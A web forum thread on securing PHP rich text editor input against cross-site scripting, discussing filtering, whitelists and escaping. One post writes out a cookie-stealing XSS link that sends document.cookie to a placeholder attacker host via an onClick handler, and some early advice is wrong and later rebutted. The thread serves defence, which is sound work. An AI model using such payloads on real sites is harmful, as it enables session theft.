Rich text editing

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

Roja
Tutorials Group
Posts: 2692
Joined: Sun Jan 04, 2004 10:30 pm

Rich text editing

Post by Roja »

If I have an extremely simple editing system (think blog, with little structure), and I add a rich text editor (such as FCKeditor), what general steps do I need to take to ensure security?

I'm presuming something like:

- Rich text editor for input
- Filter input (To remove what? How?)
- Add escaping for storage to DB
- Store to DB
- Pull from DB
- Escape output (To remove what? How?)
- Present output to user

The two steps with questions in parentheses (filtering input and escaping output) are the ones I am unclear on the specifics for, and I would appreciate guidance. If we are allowing users to enter *rich text*, which includes HTML, I'm very unclear on the full range of items we need to filter to ensure no XSS, JavaScript attacks, and so forth.

I'm also unclear on the specifics of what you would escape in the output. By definition, we want HTML to come through, so what would we be escaping with htmlentities()?

Any specific guidance on these general concepts is appreciated. While I'm strong on security in other areas, these two items in this specific scenario are something I've always avoided as being too risky, but I can no longer do so.

Any pre-packaged solutions for any of the above steps are also welcome. By way of example, I'll be using ADOdb for the escaping for storage, and for CRUD events. The solutions would need to be GPL-compatible.

Please be gentle. I know that I am normally one of the first people answering these types of questions, but this is an area where I am less confident, and I would appreciate the knowledge and understanding of the community to help me improve.
Burrito
Spockulator
Posts: 4715
Joined: Wed Feb 04, 2004 8:15 pm
Location: Eden, Utah

Post by Burrito »

I can't give you an all-encompassing security resolution but I can start you off with this:

By default, an RTE's output will already be "htmlentitied".

In other words, if I type <script> into my RTE, it's going to encode the "<" as &lt;, etc.

The way I've done it in the past is to use the innerHTML of the element (usually an iframe) and copy that into a hidden form field; then, on post, take the value of that field and dump it into my DB.

You'll still want to run it through mysql_real_escape_string(), but other than that, I haven't run into any issues.
pickle
Briney Mod
Posts: 6445
Joined: Mon Jan 19, 2004 6:11 pm
Location: 53.01N x 112.48W

Post by pickle »

The dangers in the input & output are possible execution of code, and broken XHTML.

FCKeditor (like most other RTEs) lets you edit the source code directly. It's easy, then, to post broken code that breaks the page displaying it. Perhaps writing a parser or somehow using a command-line version of HTML Tidy could at least tell you if the XHTML is malformed.
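
A rough sketch of such a malformed-markup check follows. It substitutes PHP's DOM extension for HTML Tidy, which is an assumption and not something tested in this thread. The function name isWellFormedFragment is made up for illustration, and it checks XML well-formedness only, not validity against the XHTML DTD.

```php
<?php
// Hypothetical helper: reports whether a fragment parses as well-formed XML.
// It does NOT validate against the XHTML DTD and does nothing about XSS.
function isWellFormedFragment(string $fragment): bool
{
    // Collect parse errors internally instead of emitting PHP warnings.
    $previous = libxml_use_internal_errors(true);

    $doc = new DOMDocument();
    // Wrap in one root element so several top-level nodes can still parse.
    $ok = $doc->loadXML('<div>' . $fragment . '</div>');

    // Restore the caller's libxml error handling.
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    return $ok;
}

var_dump(isWellFormedFragment('<p>fine <b>text</b></p>'));
var_dump(isWellFormedFragment('<p><b>broken</p></b>'));
```

Because the fragment is parsed as plain XML, named HTML entities such as &nbsp; would most likely be rejected too, so this is only a starting point for "is it broken?" and says nothing about whether the markup is safe.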

As for stopping PHP code from being executed - that's easy. Just don't ever handle that string in such a way as to be executed.

Javascript may be a little more difficult. Inline javascript will, of course, have to be put inside <script></script> tags - so you could just parse the input and strip out those tags and anything they contain.
Real programmers don't comment their code. If it was hard to write, it should be hard to understand.
Ambush Commander
DevNet Master
Posts: 3698
Joined: Mon Oct 25, 2004 9:29 pm
Location: New Jersey, US

Post by Ambush Commander »

Mmm... as the market stands now, no pure-PHP solution is satisfactory, mainly because they don't really "know" about the HTML specification. I've been working on something that does, and let me tell you, it's not easy.

The "best" way to do it would be to...

1. Lex the HTML fragment according to the SGML standard into tokens (MarkupLexer, finished that)
2. Take the tokens and pass them through a DTD, which knows about the specification and can check for many things:
   * Proper nesting (not just "do all elements close?" but "did they try to put a block-level element in an inline one?")
   * Proper attribute formats (at least a dozen RFCs for each, including URLs and CSS)
3. Recompile the tokens into HTML
4. Run a gauntlet of compatibility checks, attempting to eliminate any possible browser quirks that cause non-standard behavior and could compromise insecure browsers (esp. IE; this happens a lot)
5. If changes were made, re-rinse until the HTML stops changing
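
The "re-rinse" step at the end of the list can be sketched as a loop that re-applies a filtering pass until the output stops changing. This is only an illustration: filterUntilStable and the toy pass $stripScriptOpen are hypothetical names, and the pass stands in for the real lex / validate / recompile work, which is the hard part.

```php
<?php
// Hypothetical driver: re-applies one filtering pass until the output is stable.
// $pass stands in for the lex / validate / recompile / compatibility steps.
function filterUntilStable(string $html, callable $pass, int $maxRounds = 10): string
{
    for ($round = 0; $round < $maxRounds; $round++) {
        $next = $pass($html);
        if ($next === $html) {
            return $html; // fixed point reached: another pass changes nothing
        }
        $html = $next;
    }
    // Refuse input that never settles rather than emit a half-filtered result.
    throw new RuntimeException('Filter did not converge');
}

// Toy pass for illustration only: removes the literal string "<script>".
$stripScriptOpen = fn(string $s): string => str_ireplace('<script>', '', $s);

// A single pass would leave "<script>alert(1)" behind; the loop keeps going.
echo filterUntilStable('<scr<script>ipt>alert(1)', $stripScriptOpen), "\n"; // alert(1)
```

The example input shows why one pass is not enough: removing the inner tag reassembles a new one from the surrounding pieces, so the filter has to run again on its own output.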

Of course, no one in their right mind would do it (except me). But any other solution is unsatisfactory. This is the main reason why forums use BBcode, and why most systems that actually have HTML parsing don't do it completely correctly, and are hideously complex.

(I believe I've harped about this in a previous thread already, but I can't remember what it was)
josh
DevNet Master
Posts: 4872
Joined: Wed Feb 11, 2004 3:23 pm
Location: Palm beach, Florida

Post by josh »

Burrito wrote: if I type in <script> in my RTE, it's going to interpret the "<" as &lt; etc.
And if I telnet in and type <script> in my POST data, it's not going to escape anything.
pickle wrote: Inline javascript will, of course, have to be put inside <script></script> tags
What about

Code: Select all

<p onMouseOver="armagedon(); return false;"></p>
Or things along those lines?


I would personally say use a "fuzzy" whitelist, using preg.

If the rich text allows bold, italics, underline, and colors, for example, you can match against each one in turn:

Code: Select all

// $input is the submitted HTML; $matches receives the color and the text
preg_match('@<span style="color:#?([a-zA-Z0-9]+);">([a-zA-Z0-9]+)</span>@', $input, $matches);
This is just an example, I suck at regex
Ambush Commander
DevNet Master
Posts: 3698
Joined: Mon Oct 25, 2004 9:29 pm
Location: New Jersey, US

Post by Ambush Commander »

I don't understand: how does matching a regular expression help escape it?
josh
DevNet Master
Posts: 4872
Joined: Wed Feb 11, 2004 3:23 pm
Location: Palm beach, Florida

Post by josh »

You let the parts of the submitted string that match the expression slide by, and you htmlentities() the rest of the string. I guess you would swap out those pieces of text for placeholders, then swap them back in after the escaping?
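
A minimal sketch of that placeholder idea, assuming a small list of whitelist patterns. The function name escapeExceptWhitelisted and both patterns are made up for illustration, and htmlspecialchars() is used in place of htmlentities() for the escaping step.

```php
<?php
// Hypothetical helper: keeps substrings matching a whitelist pattern and
// escapes everything else. The patterns passed in are assumptions.
function escapeExceptWhitelisted(string $input, array $patterns): string
{
    // Strip NUL bytes first so user input cannot imitate a placeholder.
    $input = str_replace("\x00", '', $input);

    $kept = [];
    foreach ($patterns as $pattern) {
        $input = preg_replace_callback($pattern, function (array $m) use (&$kept): string {
            $token = "\x00" . count($kept) . "\x00"; // NUL-delimited placeholder
            $kept[$token] = $m[0];                   // remember the whitelisted markup
            return $token;
        }, $input);
    }

    // Escape whatever did not match, then swap the whitelisted pieces back in.
    $escaped = htmlspecialchars($input, ENT_QUOTES, 'UTF-8');
    return $kept ? strtr($escaped, $kept) : $escaped;
}

$patterns = [
    '@<b>[a-zA-Z0-9 ]+</b>@',
    '@<span style="color:#?[a-zA-Z0-9]+;">[a-zA-Z0-9 ]+</span>@',
];

echo escapeExceptWhitelisted('<b>hi</b> <a href="#" onClick="x()">free beer</a>', $patterns), "\n";
```

Patterns this strict only let through tags wrapping plain letters, digits, and spaces, so nested or punctuated markup gets escaped as well. That is the trade-off of a regex whitelist: it stays safe by being very narrow.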
pickle
Briney Mod
Posts: 6445
Joined: Mon Jan 19, 2004 6:11 pm
Location: 53.01N x 112.48W

Post by pickle »

jshpro2 wrote: What about

Code: Select all

<p onMouseOver="armagedon(); return false;"></p>

Or things along those lines?
armagedon() will still have to be declared within <script></script> tags. The worst that'll do (unless Roja defines a function armagedon()) is generate a script error... I think.
Real programmers don't comment their code. If it was hard to write, it should be hard to understand.
josh
DevNet Master
Posts: 4872
Joined: Wed Feb 11, 2004 3:23 pm
Location: Palm beach, Florida

Post by josh »

That's just an example. Instead of calling that function, you can put JavaScript right in there. Here's a different example, though:

Code: Select all

<a href="#" onClick="window.location.href='http://cookiestealer.com/script.php?ssid='+document.cookie">free beer click here</a>

no <script> tags needed
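
To make the point concrete, here is a small sketch of a filter that only strips <script> blocks, run against a link like the one above. The function name stripScriptBlocks and the sample post are made up for illustration; this shows the weakness and is not a recommended filter.

```php
<?php
// Naive filter of the kind discussed above: drops <script>...</script> blocks only.
function stripScriptBlocks(string $html): string
{
    return preg_replace('@<script\b[^>]*>.*?</script>@is', '', $html);
}

$post = '<script>alert(1)</script>'
      . '<a href="#" onClick="alert(document.cookie)">free beer click here</a>';

$filtered = stripScriptBlocks($post);

// The script block is gone, but the inline event handler is untouched.
var_dump(stripos($filtered, '<script') === false); // bool(true)
var_dump(stripos($filtered, 'onclick') !== false); // bool(true)
```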
Burrito
Spockulator
Posts: 4715
Joined: Wed Feb 04, 2004 8:15 pm
Location: Eden, Utah

Post by Burrito »

jshpro2 wrote: and if I telnet in and type <script> in my POST data its not going to escape anything
So use a challenge/response on your form to prevent that.
Ambush Commander
DevNet Master
Posts: 3698
Joined: Mon Oct 25, 2004 9:29 pm
Location: New Jersey, US

Post by Ambush Commander »

Aw, come on, it's not that hard to spoof a challenge/response (the challenge is there for protection from third-party attackers). Anything client-side cannot be trusted. The rich text editor presents a WYSIWYG view, translates it into HTML, and then sends that to the server as regular POST data.
shiflett
Forum Contributor
Posts: 124
Joined: Sun Feb 06, 2005 11:22 am

Post by shiflett »

How much HTML do you want to allow? For simple things, I find it easiest to escape everything and then convert allowed entities back to their original form. This also lets you make sure the user has closed bold tags and things of that nature.
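
A minimal sketch of that escape-then-restore approach, assuming only attribute-less b, i, and u tags are allowed. The function name escapeThenRestore and the default tag list are made up for illustration.

```php
<?php
// Hypothetical helper: escape everything, then restore a fixed set of simple tags.
function escapeThenRestore(string $input, array $allowedTags = ['b', 'i', 'u']): string
{
    $out = htmlspecialchars($input, ENT_QUOTES, 'UTF-8');

    foreach ($allowedTags as $tag) {
        $open  = substr_count($out, "&lt;$tag&gt;");
        $close = substr_count($out, "&lt;/$tag&gt;");
        if ($open !== $close) {
            continue; // unbalanced: leave this tag escaped rather than break the page
        }
        // Only the exact attribute-less forms are turned back into markup.
        $out = str_replace(["&lt;$tag&gt;", "&lt;/$tag&gt;"], ["<$tag>", "</$tag>"], $out);
    }

    return $out;
}

echo escapeThenRestore('<b>bold</b> <script>x</script>'), "\n";
echo escapeThenRestore('<b onclick="x()">hi</b>'), "\n";
```

Since only the exact escaped forms of the allowed tags are converted back, anything carrying attributes (including event handlers) stays escaped. The balance check here just compares counts, so it would not catch tags closed in the wrong order.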

For more complex needs, you might find this helpful:

http://cyberai.com/inputfilter/

It lets you take a whitelist or blacklist approach with both tags and attributes, and it also has an option to automatically remove common problems.
Ambush Commander
DevNet Master
Posts: 3698
Joined: Mon Oct 25, 2004 9:29 pm
Location: New Jersey, US

Post by Ambush Commander »

Note that inputfilter isn't perfect, and if you make it too permissive, it will let malicious output through (only because it doesn't actually know about the specification), although at the very least it will cause your document to stop validating (e.g. it doesn't check proper nesting of blocks and inlines).